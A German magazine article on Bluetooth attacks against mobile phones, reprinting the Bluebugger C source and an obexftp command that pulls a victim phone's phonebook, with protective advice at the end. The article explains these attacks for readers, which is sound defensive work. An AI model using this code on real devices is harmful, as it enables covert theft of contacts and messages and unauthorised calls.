Angriff durch die Luft: Bluetooth Hacking

Größe: px
Ab Seite anzeigen:

Download "Angriff durch die Luft: Bluetooth Hacking"

Transkript

1 durch die Luft: Bluetooth Hacking Angriff Marko Rogge Schwierigkeitsgrad Mit der Technologie von Bluetooth hat ein weiterer Wireless Standard Einzug in Mobiltelefone und Laptops gehalten. Unbedarft der Gefahren, die in jeder Art der Kommunikation lauern, verwenden Unternehmen und Anwender Bluetooth und unterschätzen die Gefahren deutlich. Auf einer Entfernung zwischen 10 und 100 Meter ist es möglich, die Kommunikation von Bluetooth abzufangen, SMS oder Adressbücher zu lesen oder Handys zum Absturz zu bringen. Das Funknetz Bluetooth ist auf einer Frequenzbreite von 2,4 GHz anzutreffen und arbeitet auf 79 Kanälen, die für unterschiedlichste Zwecke verwendet werden können. Datenübertragungen sind bei Bluetooth synchron / symmetrisch mit einer Geschwindigkeit von bis zu 433,9 kbit/s möglich. Diese erschließt interessante Möglichkeiten, auch große Datenmengen schnell zu transportieren. Die Sprachkommunikation hingegen kann nur mit 64 kbit/s übertragen werden, und Bluetooth stellt dafür 3 Kanäle zur Verfügung. Dies entspricht in etwa der Sprachqualität von ISDN. Die Reichweite für die Kommunikation zwischen Bluetooth Geräten reicht von 10 Meter bis hin zu 100 Meter. Abhängig ist die Reichweite von der Sendeleistung des entsprechenden Gerätes. Normale Geräte, in denen Bluetooth integriert ist, haben eine Reichweite von 10 Metern. Geräte mit einer extra Antenne können durchaus eine Reichweite von 100 Meter und mehr erreichen. Bluetooth erkennt andere Geräte, die sich innerhalb der Reichweite befinden, über eine Inquiry-Prozedur, die dann die Geräteklassen und Zeittakte beinhaltet und sendet. Die Kommunikation ist der herkömmlichen Kommunikation angeglichen, da beide Geräte entsprechend Master und Slave benannt werden. Die In diesem Artikel erfahren Sie... Was genau ist Bluetooth; Sicherheitsmechanismen der Bluetooth Technologie; Angriff auf mobile Devices mit Bluetooth; Bekannte Angriffszenarien; Schutzmöglichkeiten und Ausblick in die Zukunft. Was Sie vorher wissen/können sollten... Kenntnisse im Bereich Linux Hacking; Programmierung C, C++; Bluetooth Technik. 34

2 Bluetooth Hacking Listing 1a. Bluebugger im Detail /* * Copyright (C) 2006 by Martin J. Muench <mjm@codito.de> * * Bluebug utility * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include "bt.h" #include "at.h" #include "wrap.h" #include "debug.h" #define VERSION "0.1" #define SAFE_DELETE(x) if(x) free(x); Verbindung kann dabei zwischen den Geräten nur durch eine entsprechende Paging-Anforderung geschehen. Bei dieser Form der Kommunikation versteht es Bluetooth bis zu 255 Geräte miteinander kommunizieren zu lassen. Es können 7 Slaves und 1 Master zeitgleich kommunizieren, die anderen werden geparkt. Sicherheitsmechanismen Bluetooth Bei der Kommunikation wird bei Bluetooth auf Verschlüsselung gesetzt, die zwischen Master und Slave greift, wenn Geräte miteinander verbunden werden sollen. Bei der Verschlüsselung von Bluetooth setzt man in der Regel auf einen 128 kbit Schlüssel, der zwischen beiden Geräten generiert wird, die miteinander eine Verbindung eingehen wollen. Die meisten Bluetooth-Geräte liefern dazu das entsprechende Sicherheitsmenü mit, das eine Paarung /* local functions */ static void Usage(const char *); static void execute_command(file *, int, char *[]); static void sig_handler(int); int opterr = 0; /* shutup getopt() */ FILE *output; char *target_addr=null, *name=null, *device=null; FILE *rfcomm_fp = NULL; int sock=-1, dev_id=-1, hci_sock=-1; /* * Small wrapper to hack mobile phones (for dummies) */ Abbildung 1. Verbindung Bluetooth int main(int argc, char *argv[]) { int c, timeout=5000, name_lookup=1, channel=17; char filename[filename_max]; bdaddr_t bdtmp; bdaddr_t *bdaddr; /* default output = stdout */ output=stdout; Abbildung 2. Btscanner 1 printf("\nbluebugger %s ( MaJoMu ) " \n\n", VERSION); if (geteuid()!= 0) Usage("You need (e)uid 0 (e.g. be root) while((c = getopt(argc, argv, "m:a:t:d:i:no:c:"))!= -1) { switch(c) { case 'a': target_addr = (char *)Malloc(strlen(optarg)+1); strcpy(target_addr, optarg); Abbildung 3. Btscanner 2 35

3 Listing 1b. Bluebugger im Detail case 'd': device = (char *)Malloc(strlen(optarg)+1); strcpy(device, optarg); case 'm': name = (char *)Malloc(strlen(optarg)+1); strcpy(name, optarg); case 't': timeout = atoi(optarg) * 1000; case 'n': name_lookup = 0; case 'c': channel = atoi(optarg); case 'o': if((output = fopen(optarg, "w+")) == NULL) { fprintf(stderr, "Cannot open '%s': %s\n", optarg, strerror(errno)); default: Usage("Invalid arguments"); /* get rid of parsed args */ argv += optind; argc -= optind; /* Get bt address */ if(target_addr == NULL) Usage("You have to set the target address"); fprintf(output, "Target Device:\t'%s'\n", target_addr); str2ba(target_addr, &bdtmp); bdaddr = &bdtmp; zweier Geräte ermöglicht und somit absichern soll. Hier am Beispiel zu sehen. Das Schlüsselsymbol zeigt an, dass es sich hierbei um eine bereits sichere Paarung zweier Geräte handelt. Dazu gehen beide Geräte eine Bindung ein, die sich Pairing nennt und in beiden Geräten gespeichert wird. Beim Pairing müssen beide Geräte den jeweiligen Schlüssel akzeptieren. Die Generierung dieser Schlüssel erfolgt aus einer Zufallszahl und einer PIN, die eingegeben werden muss. Die Verschlüsselung basiert in der Regel auf der Authentisierung zweier Geräte. Bei der Authentisierung handelt es sich um ein Verfahren, dass sich Challenge Response Verfahren nennt und eine Authentisierung zweier Geräte ermöglicht. Dabei erfolgt die Authentisierung einseitig und kann jedoch für zwei Geräte umgekehrt nochmals wiederholt werden. Das Verfahren verläuft nach dem Schema ab, dass sich ein Gerät (Claimant) bei einem anderen Gerät authentisiert (Verifier). Der Claimant erhält vom Verifier eine Zufallszahl übermittelt und beweist anschliessend mit seiner richtigen Antwort, dass der Verbindungsschlüssel korrekt ist und Abbildung 4. Bthci-Toolscan /* Get device ID */ if ((dev_id = hci_get_route(null)) == -1) { fprintf(stderr, "hci_get_route() failed: %s\n", strerror(errno)); /* Set signal handler */ signal(sigint, sig_handler); /* Setup socket */ if ((hci_sock = hci_open_dev(dev_id)) == -1) { fprintf(stderr, "hci_open_dev() failed: %s\n", strerror(errno)); /* Get target device name */ if(name_lookup) { char asc_name[256]=""; hci_read_remote_name(hci_sock, bdaddr, sizeof(asc_name)-1, asc_name, timeout); fprintf(output, "Target Name: \t'%s'\n\n", asc_name); else fprintf(output, " Abbildung 5. Blooover 1 Abbildung 6. Blooover 2 36

4 Listing 1c. Bluebugger im Detail /* Configure hci socket */ bt_configure(dev_id, hci_sock, name); /* Create rfcomm socket for communication */ if((sock = socket(af_bluetooth, SOCK_RAW, BTPROTO_RFCOMM)) == -1) { fprintf(stderr, "socket() failed: %s\n", strerror(errno)); exit(exit_success); /* bind rfcomm socket (create dev) */ if(bt_bind(sock, dev_id, bdaddr, channel)) { fprintf(stderr, "bt_bind() failed: %s\n", strerror(errno)); bt_release(sock, dev_id); close(sock); exit(exit_success); /* wait 1 sec to ensure dev is ready */ sleep(1); /* Use rfcomm device */ snprintf(filename, FILENAME_MAX, "%s%u", device == NULL? "/dev/rfcomm" : device, dev_id); if (!(rfcomm_fp = fopen(filename, "r+"))) { fprintf(stderr, "Cannot open '%s': %s\n", filename, strerror(errno)); bt_release(sock, dev_id); close(sock); /* Set rfcomm device options */ if (bt_rfcomm_config(fileno(rfcomm_fp)) == 0) { anerkannt wird. Der Claimant generiert aus der Geräteadresse und einer Zufallszahl bei der Antwort einen 32bit Schlüssel und sendet diesen an den Verifier zurück. Die Antwort des Verifier wird mit der gleichen Verfahrensweise berechnet und beide Ergebnisse sollten nun übereinstimmen. Ist die Anwort des Verifier identisch mit der Anfrage des Claimant, authentisiert der Verifier den Claimant. Sicherheitsbetriebsarten von Bluetooth Geräten Hierbei wird grundsätzlich in 3 Betriebsarten, die Bluetooth Geräte haben können unterschieden: Ein Bluetooth Gerät reagiert auf Authentisierungsanfragen, aber selbst bietet es keine eigenen Sicherheitsmechanismen an; Das Bluetooth Gerät stellt die Sicherheitsmechanismen auf Anfrage bei einer Verbindung bereit und liefert dann entsprechende Sicherheitsmerkmale; /* execute main commands */ execute_command(rfcomm_fp, argc, argv); else fprintf(stderr, "bt_rfcomm_config() failed /* close rfcomm device */ fclose(rfcomm_fp); /* Cleanup */ bt_release(sock, dev_id); close(sock); /* Cleanup */ SAFE_DELETE(name); SAFE_DELETE(device); SAFE_DELETE(target_addr); /* Close output file */ if(output!= stdout) fclose(output); Abbildung 7. Das Adressbuch eines Nokia Mobiltelefones ausgelesen und sichtbar auf dem Laptop des Angreifers printf("...done\n exit(exit_success); static void execute_command(file *rfcomm_fp, int argc, char *argv[]) { int i; Abbildung 8. SMS Nachrichten werden im Klartext auf den Computer des Angreifers übertragen 38

5 Listing 1d. Bluebugger im Detail /* shut up */ at_disable_echo(rfcomm_fp); /* Default = get info/phonebook/messages */ if(!argc) { at_parse_manufacturer_identification(rfcomm_fp); at_parse_identification(rfcomm_fp); at_parse_phonebook_list(rfcomm_fp); at_parse_message_list(rfcomm_fp); return; /* Process given commands */ for(i = 0; i < argc ; i++) { debug(("+ Command: AT%s\n\n", argv[i])); if(!strcmp(argv[i], "info")) { at_parse_manufacturer_identification(rfcomm_fp); at_parse_identification(rfcomm_fp); else if(!strcmp(argv[i], "phonebook")) { at_parse_phonebook_list(rfcomm_fp); else if(!strcmp(argv[i], "messages")) { at_parse_message_list(rfcomm_fp); else if(!strcmp(argv[i], "dial")) { if(i + 1 >= argc) Usage("You need to specify the number for 'dial'"); at_dial(rfcomm_fp, argv[++i]); /* else if(!strcmp(argv[i], "sms")) { if(i + 2 >= argc) Usage("You need to specify the number and text for 'sms'"); at_sms(rfcomm_fp, argv[i + 1], argv[i + 2]); i = i + 2; */ else { at_custom(rfcomm_fp, argv[i]); Das Bluetooth Gerät kann nur durch entsprechende Sicherheitsmechanismen eine Verbindung zu anderen Geräten aufnehmen. Bei vielen Geräten, die mit Bluetooth ausgestattet sind, besteht zusätzlich die Möglichkeit, eine Einstellung vorzunehmen, die eine Inquiry nicht erlaubt. Dabei ist das Gerät für andere nicht sichtbar. Ebenfalls besteht die Möglichkeit, dass Pager- und Pairinganfragen unbeantwortet bleiben. Angriffsarten auf Bluetooth Geräte Die meisten Bluetooth Geräte werden fast immer in Default Einstellungen unsicher ausgeliefert. Ein Zustand der aus der Computerbranche bestens bekannt ist. In diesem Fall sind Bluetooth Geräte immer Inquiry und lassen somit einen Datenaustausch via Bluetooth zu. Grundsätzliche Sicherheitsfunktionen sind ausgeschaltet, sprich es ist keine Authentisierung notwendig, oder PINs sind auf Standard 0000 oder 1234 eingestellt. Diese Einstellungen sollten nach Inbetriebnahme eines Bluetooth Gerätes umgehend verändert werden. Ein weiteres Sicherheitsrisiko ist das Erraten von Passwörtern. Zu schwache Passwörter und PINs können return; /* * Misc funcs */ /* Usage */ static void Usage(const char *err_msg) { printf("usage: Bluebugger [OPTIONS] -a <addr> [MODE] \n " -a <addr> = Bluetooth address of target \n printf(" Options: " printf(" -m <name> = Name to use when connecting (default: '') Abbildung 9. Sdp-Tool Abbildung 10. Receiving Phonebook 40

6 dazu führen, dass ein Angreifer sich dadurch eines Gerätes bemächtigen kann und somit die Kontrolle erhält. Ebenfalls aus der Computertechnik bekannt und noch sehr weit verbreitet sind Man-in-the-Middle Attacken. Bei dieser Form der Angriffe ist es durch unzulängliche Sicherheitseinstellungen einem Angreifer möglich, sich zwischen zwei Geräte zu schalten. Der Angreifer gibt sich bei jedem der Geräte als das andere aus und kann somit jegliche Datenpakete abfangen, die von einem Gerät zum anderen übertragen werden. Hierbei besteht die Möglichkeit, dass ein Angreifer Authentisierungsanfragen abfängt und entsprechend an das andere Gerät weiterleitet, um somit selbst Zugriff zu erhalten. Ein weiteres Problem stellt die Verbindung direkt dar. Bluetooth breitet sich unkontrollierter in der Funkstrecke aus, als andere Funknetze. Dadurch ist es einem Angreifer möglich, den Datenverkehr auf Protokollebene zu belauschen und entsprechend abgefangene Daten offline auszuwerten. Die dabei übertragenen Daten können je nach Brisantz von Bedeutung sein. Angriffsarten im Detail vorgestellt Blooover ist eine Software, die eindrucksvoll demonstriert, welche Angriffe auf mobile Devices, hier Handys, möglich sind. Man kann unterscheiden zwischen BlueBug und BlueSnarf, wobei hier auch eine Kombination der Varianten möglich ist. Ein Angriff kann durch ein Mobiltelefon oder ein Laptop geschehen und bleibt in den meisten Fällen sogar unentdeckt. Das Opfer bemerkt nicht, dass gerade ein Angreifer dabei ist, die SMS auszulesen und das Telefonbuch auf das Angreifer-Gerät zu laden. BlueBug ist eine Angriffsmethode um das Opfer-Gerät in die Kontrolle des Angreifers zu bringen. Dabei ist es möglich, Anrufweiterleitungen einzurichten, SMS zu senden und Anrufe zu tätigen. Bei BlueSnarf handelt es sich um eine Angriffstechnik, die es einem Angreifer ermöglicht, Daten hin und her zu kopieren. Das ist es in der Listing 1e. Bluebugger im Detail " -d <device> = Device to use (default: '/dev/rfcomm') " -c <channel> = Channelto use (default: 17) " -n = No device name lookup " -t <timeout> = Timeout in seconds for name lookup (default: 5) " -o <file> = Write output to <file> printf(" printf(" Mode: " printf(" info = Read Phone Info (default) " phonebook = Read Phonebook (default) " messages = Read SMS Messages (default) " dial <num> = Dial number " ATCMD = Custom Command (e.g. '+GMI') printf(" printf(" Note: Modes can be combined, e.g. 'info phonebook +GMI' printf("\n* %s\n\n", err_msg); sig_handler(int signo) { /* close rfcomm device */ if(rfcomm_fp) fclose(rfcomm_fp); /* Cleanup */ if(sock!= -1 && dev_id!= -1) { bt_release(sock, dev_id); close(sock); if(hci_sock!= -1) /* Cleanup */ SAFE_DELETE(name); SAFE_DELETE(device); SAFE_DELETE(target_addr); /* EOF */ 42

7 heutigen Zeit nicht gerade unbedeutend, lagern doch viele Unternehmer Daten auf das Handy aus, weil diese mit immer größeren Speichermedien versorgt sind. Eine Software, die es ermöglicht, auf das Adressbuch von Handys zu gelangen und auch die SMS zu laden, ist bluebugger von Martin J. Münch. Ein kleiner Test kann aufzeigen, ob man selbst gegen diese Art von Bluetooth Angriffen sicher ist. Hierfür benutzt man einen Bluetooth Scanner wie z.b. btscanner und scannt die Umgebung nach Bluetooth Devices ab. Das eigene Handy sollte bei einem solchen Test mit aktiviertem Bluetooth eingeschaltet sein. Hierfür kann man unter Linux auch den Befehl hcitool scan verwenden. Das Ergebnis ist bei einem Scan nach Bluetooth Devices das Gleiche: Die MAC Adresse des Gerätes wird angezeigt. Software wie Bluebugger aber auch Blooover (Java Applikation) können derzeit nur einige Mobiltelefone angreifen und die Schwachstellen dort ausnutzen. Aber es ist in diversen Tests erfolgreich gezeigt worden, dass es möglich ist, das Adressbuch und die SMS aus einem Mobiltelefon auszulesen. Blooover ist ein Proof-of-Concept der Gruppe Trifinite und funktioniert derzeit auf einigen Nokia und SonyEricsson Mobiltelefonen. Optionen einstellen mit Blooover, um zu testen, welche Schwachstelle das eigene Telefon hat. Aber auch das Scannen wird grafisch übersichtlich dargestellt, und man kann sich die Funktionen des Opfer-Gerätes anschauen. Hierbei sei erwähnt, dass diese Methode nicht bei allen Geräten mit Bluetooth funktioniert. Das Nokia 6310i ist jedoch ein sehr weit verbreitetes Mobiltelefon. Es wird als Autotelefon von sehr vielen Autoherstellern direkt eingebaut. Das, was Tools wie Blooover oder bluebugger machen, kann man auch auf einer Linuxkonsole manuell durchführen. Hierbei bedient man sich Protokollen wie z.b. OBEX FTP oder BTFTP von Affix. Einige Mobiltelefone oder auch Computer sind mit somit schutzlos den Möglichkeiten eines Angreifers ausgeliefert. Mit dem Befehl sdpbrowse besteht die Möglichkeit, die Fähigkeiten eines Bluetooth Gerätes heraus zu finden, um zu schauen, ob man via FTP darauf zugreifen kann. Im Sektor Service Name: OBEX Object Push erkennt man, welcher Channel geöffnet ist, um über diesen dann auf ein Device zugreifen zu können. Möglich wäre hier als Beispiel, das Telefonbuch eines Opfer-Gerätes auf den Computer zu laden: obexftp -b 00:12:D1:7A:5A:3E -B 10 -g telecom/pb.vcf Dieser Vorgang muss nicht zwangsweise bei allen Bluetooth Geräten funktionieren, da auch die Hersteller bemüht sind, mehr Sicherheit in die Geräte zu bringen. Dennoch funktionierten diese unterschiedlichen Angriffe auf verschiedenen Devices. Eine Auswahl der verwundbaren Geräte ist auf The Bunker nachzulesen. Es sind jedoch nicht nur diese Geräte betroffen. Collin Mulliner hat heraus gefunden, dass es möglich ist, die Kommunikation einer Bluetooth Tastatur abzugreifen und diese entsprechend auszunutzen. Ein Angreifer kann mit dieser Angriffsart vorgeben eine Bluetooth Tastatur zu sein und so einen PC steuern. Der Angriff erfolgt also direkt auf den PC des Opfers. Das Proof-of-Concept ist ausführlich beschrieben und zeigt die Angriffsmöglichkeiten auf: mulliner.org/bluetooth/hidattack.php. Eine weitere Angriffsmöglichkeit ist das Sniffen. Das Belauschen von Kommunikation im Bereich Netzwerke ist mittels Sniffing hinlänglich bekannt und wird in der Praxis von Angreifern häufig zum Sammeln von Daten verwendet. Auch bei der Bluetooth Technologie ist es möglich, Sniffing zu betreiben und einen handelsüblichen USB-Bluetooth Stick in einen Sniffer zu verwandeln. Somit kann man dann die Kommunikation von Bluetooh Geräten belauschen, Daten mitschneiden und aufzeichnen. Diese Möglichkeit des Sniffing bei Bluetooth wurde erst kürzlich von Max Moser publiziert. Max Moser, unter anderem Gründer der Security Distribution Back Track, zeigte auf, wie somit neue Möglichkeiten erschlossen werden können, den Wireless Standard Bluetooth auszuhebeln. Unternehmen unterschätzen das Risiko eines Angriffs über Bluetooth und sehen die Gefahren als viel zu klein. Sofern man eine Verbindung via Bluetooth entdeckt hat, diese mittels eines Sniffers ausspionieren kann, besteht die Möglichkeit, in die aktive Kommunikation einzugreifen. BTCrack ist eine Software, die dann die Technik besitzt, das so genannte Peering der Bluetooth Devices auszuhebeln. Bei diesem Angriff kann die PIN des Mobiltelefons ausgelesen werden. Noch ist für die Möglichkeit des Sniffens von Bluetooth keine Software für Linux erhältlich, aber das ist bekanntlich nur eine Frage der Zeit. Den zwei israelischen Forschern Avishai Wool und Yaniv Shaked ist es vor einiger Zeit gelungen, die Verschlüsselung Safer+ für das Pairing Verfahren zu knacken. Kurze Zeit später gelang es Wool und Shaked ebenfalls, eine Repairing Attacke durchzuführen, in dem der Link Key als verloren gemeldet und erneut angefordert wurde. Dies ruft einen neuen Pairing Prozess hervor, und diese Daten können wiederum mitgelesen, werden um die PIN zu knacken. Bei dieser Art des Angriffs ist es erforderlich, dass der gesamte Pairing Vorgang mit gelesen wird, um die PIN dann zu knacken. Im Internet Bluebugger, Martin J. Münch; Blooover, JRE Tool; Btscanner 2.1; db/ Datenbank verwundbare Geräte; Collin Mulliner, HID Attack; research / busting _ bluetooth_ myth.pdf Busting the Bluetooth Mysth, Max Moser; _ tools.php BTCrack; softwares/bluetooth/ Bluetooth Spammer. 44

8 Bluetooth Hacking Schutzmöglichkeiten und Ausblick in die Zukunft Wie weit die Angriffsmöglichkeiten von Bluetooth noch gehen können ist deutlich. Bluetooth ist schon fast zum Standard in Mobiltelefonen, Smartphones und Laptops geworden und wird ab Werk mitgeliefert. Viele Unternehmen oder unbedarfte Benutzer haben diese Technik eingeschaltet und bieten Angreifern noch mehr Möglichkeiten, sich unbefugt Zugriff zu verschaffen. Da nicht nur Laptops über Bluetooth verfügen, sondern auch Mobil- telefone, sind die Möglichkeiten der Angriffe weitreichender und lassen sich mit WLAN kombinieren. Neben WLAN, das ja bekanntlich viele Jahre als sicher galt, ist nun Bluetooth immer mehr in das Visier von Hackern gerückt und wird in der Zukunft weitere Angriffsmöglichkeiten bieten. Benutzer von Bluetooth, egal auf welchem Gerät, sollten per default Bluetooth ausgeschaltet haben und nicht nur im Modus unsichtbar sein. Denn viele der Angriffstechniken basieren rein auf der MAC Adresse eines Gerätes, und diese wird auch dann erreichbar sein. Dazu muss ein Device nicht zwingend sichtbar sein. Sofern man via Bluetooth eine Datei empfangen möchte, sollte man auch erst dann Bluetooth einschalten und darauf achten, dass der Absender auch exakt der ist, von dem man eine Sendung erwartet. Dies ist wichtig, da in der Zukunft auch Angriffe via SPAM zu erwarten sind. Hierbei könnten Bluetooth Devices vorübergehend lahm gelegt oder für die weitere Verbreitung von SPAM benutzt werden. W E R B U N G 45

Outlook. sysplus.ch outlook - mail-grundlagen Seite 1/8. Mail-Grundlagen. Posteingang

Outlook. sysplus.ch outlook - mail-grundlagen Seite 1/8. Mail-Grundlagen. Posteingang sysplus.ch outlook - mail-grundlagen Seite 1/8 Outlook Mail-Grundlagen Posteingang Es gibt verschiedene Möglichkeiten, um zum Posteingang zu gelangen. Man kann links im Outlook-Fenster auf die Schaltfläche

Mehr

SMS/ MMS Multimedia Center

SMS/ MMS Multimedia Center SMS/ MMS Multimedia Center der BEYOND THE NET GmbH BEYOND THE NET GmbH Seite 1 Unser Multimedia Center ist eine WEB basierende Anwendung, die es ermöglicht von einer Zentrale aus, viele Mitarbeiter zu

Mehr

Enigmail Konfiguration

Enigmail Konfiguration Enigmail Konfiguration 11.06.2006 Steffen.Teubner@Arcor.de Enigmail ist in der Grundkonfiguration so eingestellt, dass alles funktioniert ohne weitere Einstellungen vornehmen zu müssen. Für alle, die es

Mehr

Tipps und Tricks zur Installation von Java-basierten Programmen auf Handys

Tipps und Tricks zur Installation von Java-basierten Programmen auf Handys Tipps und Tricks zur Installation von Java-basierten Programmen auf Handys VORLÄUFIG Inhaltsverzeichnis 1.0 Allgemein...3 1.1 Voraussetzungen für die MODESCO BT-HandeySec Programme...3 2.0 Installation...3

Mehr

Nutzung von GiS BasePac 8 im Netzwerk

Nutzung von GiS BasePac 8 im Netzwerk Allgemeines Grundsätzlich kann das GiS BasePac Programm in allen Netzwerken eingesetzt werden, die Verbindungen als Laufwerk zu lassen (alle WINDOWS Versionen). Die GiS Software unterstützt nur den Zugriff

Mehr

ROFIN App Benutzerhandbuch. Version 1.0

ROFIN App Benutzerhandbuch. Version 1.0 ROFIN App Benutzerhandbuch Version 1.0 Inhaltsverzeichnis 1. Beschreibung 2. Passwort und Einstellungen 3. Support Tab 4. Vertriebs Tab 5. Web Tab 6. Häufig gestellte Fragen BESCHREIBUNG Die ROFIN App

Mehr

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b AGROPLUS Buchhaltung Daten-Server und Sicherheitskopie Version vom 21.10.2013b 3a) Der Daten-Server Modus und der Tresor Der Daten-Server ist eine Betriebsart welche dem Nutzer eine grosse Flexibilität

Mehr

Wireless LAN PCMCIA Adapter Installationsanleitung

Wireless LAN PCMCIA Adapter Installationsanleitung Wireless LAN PCMCIA Adapter Installationsanleitung Diese Anleitung hilft Ihnen bei der Installation des Funknetzwerkadapters für Ihre PCMCIA Schnittstelle und erläutert in wenigen Schritten, wie Sie den

Mehr

Fax einrichten auf Windows XP-PC

Fax einrichten auf Windows XP-PC Um ein PC Fax fähig zu machen braucht man einen sogenannten Telefon Anschluss A/B das heißt, Fax funktioniert im Normalfall nur mit Modem nicht mit DSL. Die meisten neueren PCs haben ein Modem integriert.

Mehr

MSXFORUM - Exchange Server 2003 > SMTP Konfiguration von Exchange 2003

MSXFORUM - Exchange Server 2003 > SMTP Konfiguration von Exchange 2003 Page 1 of 8 SMTP Konfiguration von Exchange 2003 Kategorie : Exchange Server 2003 Veröffentlicht von webmaster am 25.02.2005 SMTP steht für Simple Mail Transport Protocol, welches ein Protokoll ist, womit

Mehr

Android trifft Windows*

Android trifft Windows* auf Windows und Android 13.10.2015 Android trifft Windows* Alles im Griff, aber ohne Draht und Stick! * Datenaustausch über 1 Was ist (BT) etabliert eine Punkt-zu-Punkt-Verbindung (peer-topeer) auf kurze

Mehr

Informatik Grundlagen, WS04, Seminar 13

Informatik Grundlagen, WS04, Seminar 13 Informatik Grundlagen, WS04, Seminar 13 Informatik Informatik Grundlagen, Seminar 13 WS04 1 Was wir heute besprechen Nachbesprechen von Übungsblatt 11 Rekursion Grundprinzipien Übung Besprechung Übungsblatt

Mehr

iphone- und ipad-praxis: Kalender optimal synchronisieren

iphone- und ipad-praxis: Kalender optimal synchronisieren 42 iphone- und ipad-praxis: Kalender optimal synchronisieren Die Synchronisierung von ios mit anderen Kalendern ist eine elementare Funktion. Die Standard-App bildet eine gute Basis, für eine optimale

Mehr

teamsync Kurzanleitung

teamsync Kurzanleitung 1 teamsync Kurzanleitung Version 4.0-19. November 2012 2 1 Einleitung Mit teamsync können Sie die Produkte teamspace und projectfacts mit Microsoft Outlook synchronisieren.laden Sie sich teamsync hier

Mehr

Konfiguration von Igel ThinClients fu r den Zugriff via Netscaler Gateway auf eine Storefront/ XenDesktop 7 Umgebung

Konfiguration von Igel ThinClients fu r den Zugriff via Netscaler Gateway auf eine Storefront/ XenDesktop 7 Umgebung Konfiguration von Igel ThinClients fu r den Zugriff via Netscaler Gateway auf eine Storefront/ XenDesktop 7 Umgebung Inhalt 1. Einleitung:... 2 2. Igel ThinClient Linux OS und Zugriff aus dem LAN... 3

Mehr

Wireless Installationshandbuch

Wireless Installationshandbuch ZyXEL P320W Wireless Firewall Router Wireless Installationshandbuch senselan GmbH Duensstrasse 1 3186 Düdingen Tel 026 505 00 00 Fax 026 505 00 02 www.senselan.ch support@senselan.ch Inhaltsverzeichnis

Mehr

Windows-Sicherheit in 5 Schritten. Version 1.1 Weitere Texte finden Sie unter www.buerger-cert.de.

Windows-Sicherheit in 5 Schritten. Version 1.1 Weitere Texte finden Sie unter www.buerger-cert.de. Windows-Sicherheit in 5 Schritten Version 1.1 Weitere Texte finden Sie unter www.buerger-cert.de. Inhalt: 1. Schritt: Firewall aktivieren 2. Schritt: Virenscanner einsetzen 3. Schritt: Automatische Updates

Mehr

Dokumentation IBIS Monitor

Dokumentation IBIS Monitor Dokumentation IBIS Monitor Seite 1 von 16 11.01.06 Inhaltsverzeichnis 1. Allgemein 2. Installation und Programm starten 3. Programmkonfiguration 4. Aufzeichnung 4.1 Aufzeichnung mitschneiden 4.1.1 Inhalt

Mehr

Informationen zum neuen Studmail häufige Fragen

Informationen zum neuen Studmail häufige Fragen 1 Stand: 15.01.2013 Informationen zum neuen Studmail häufige Fragen (Dokument wird bei Bedarf laufend erweitert) Problem: Einloggen funktioniert, aber der Browser lädt dann ewig und zeigt nichts an Lösung:

Mehr

Anleitung zur Nutzung des SharePort Utility

Anleitung zur Nutzung des SharePort Utility Anleitung zur Nutzung des SharePort Utility Um die am USB Port des Routers angeschlossenen Geräte wie Drucker, Speicherstick oder Festplatte am Rechner zu nutzen, muss das SharePort Utility auf jedem Rechner

Mehr

Tutorial about how to use USBView.exe and Connection Optimization for VNWA.

Tutorial about how to use USBView.exe and Connection Optimization for VNWA. Tutorial about how to use USBView.exe and Connection Optimization for VNWA. Tutorial über den Gebrauch von USBView.exe und die Anschluss-Optimierung für den VNWA. Es wurde beobachtet, dass bestimmte VNWA

Mehr

Installation OMNIKEY 3121 USB

Installation OMNIKEY 3121 USB Installation OMNIKEY 3121 USB Vorbereitungen Installation PC/SC Treiber CT-API Treiber Einstellungen in Starke Praxis Testen des Kartenlesegeräts Vorbereitungen Bevor Sie Änderungen am System vornehmen,

Mehr

Bluetooth Headset Modell Nr. BT-ET007 (Version V2.0+EDR) ANLEITUNG Modell Nr. BT-ET007 1. Einführung Das Bluetooth Headset BT-ET007 kann mit jedem Handy verwendet werden, das über eine Bluetooth-Funktion

Mehr

Terminabgleich mit Mobiltelefonen

Terminabgleich mit Mobiltelefonen Terminabgleich mit Mobiltelefonen Sie können Termine- und Aufgaben aus unserem Kalender, sowie die Adressdaten aus dem Hauptprogramm mit Ihrem Mobiltelefon abgleichen. MS Outlook dient dabei als Schnittstelle

Mehr

Moni KielNET-Mailbox

Moni KielNET-Mailbox Bedienungsanleitung Moni -Mailbox Die geht für Sie ran! Wann Sie wollen, wo immer Sie sind! im Festnetz Herzlichen Glückwunsch zu Moni Ihrer persönlichen -Mailbox! Wir haben Ihre persönliche -Mailbox eingerichtet.

Mehr

S/W mit PhotoLine. Inhaltsverzeichnis. PhotoLine

S/W mit PhotoLine. Inhaltsverzeichnis. PhotoLine PhotoLine S/W mit PhotoLine Erstellt mit Version 16.11 Ich liebe Schwarzweiß-Bilder und schaue mir neidisch die Meisterwerke an, die andere Fotografen zustande bringen. Schon lange versuche ich, auch so

Mehr

Nutzerhandbuch Zentrale Klassenverwaltung

Nutzerhandbuch Zentrale Klassenverwaltung Nutzerhandbuch Zentrale Klassenverwaltung Nutzerhandbuch Zentrale Klassenverwaltung...1 1. Allgemeines...2 2. Startseite...2 3. Posteingang...2 4. Klassenübersicht...3 4.1. Klassendetailansicht...4 4.2.

Mehr

Jederzeit Ordnung halten

Jederzeit Ordnung halten Kapitel Jederzeit Ordnung halten 6 auf Ihrem Mac In diesem Buch war bereits einige Male vom Finder die Rede. Dieses Kapitel wird sich nun ausführlich diesem so wichtigen Programm widmen. Sie werden das

Mehr

Barcodedatei importieren

Barcodedatei importieren Barcodedatei importieren Inhaltsverzeichnis 1 Schnittstelle Barcodedatei importieren... 2 1.1 Funktion... 2 1.2 Konfiguration... 2 1.2.1 Lizenz... 2 1.2.2 Einstellungen... 2 1.2.3 Vorarbeiten... 3 1.2.3.1

Mehr

A. Ersetzung einer veralteten Govello-ID ( Absenderadresse )

A. Ersetzung einer veralteten Govello-ID ( Absenderadresse ) Die Versendung von Eintragungsnachrichten und sonstigen Nachrichten des Gerichts über EGVP an den Notar ist nicht möglich. Was kann der Notar tun, um den Empfang in seinem Postfach zu ermöglichen? In zahlreichen
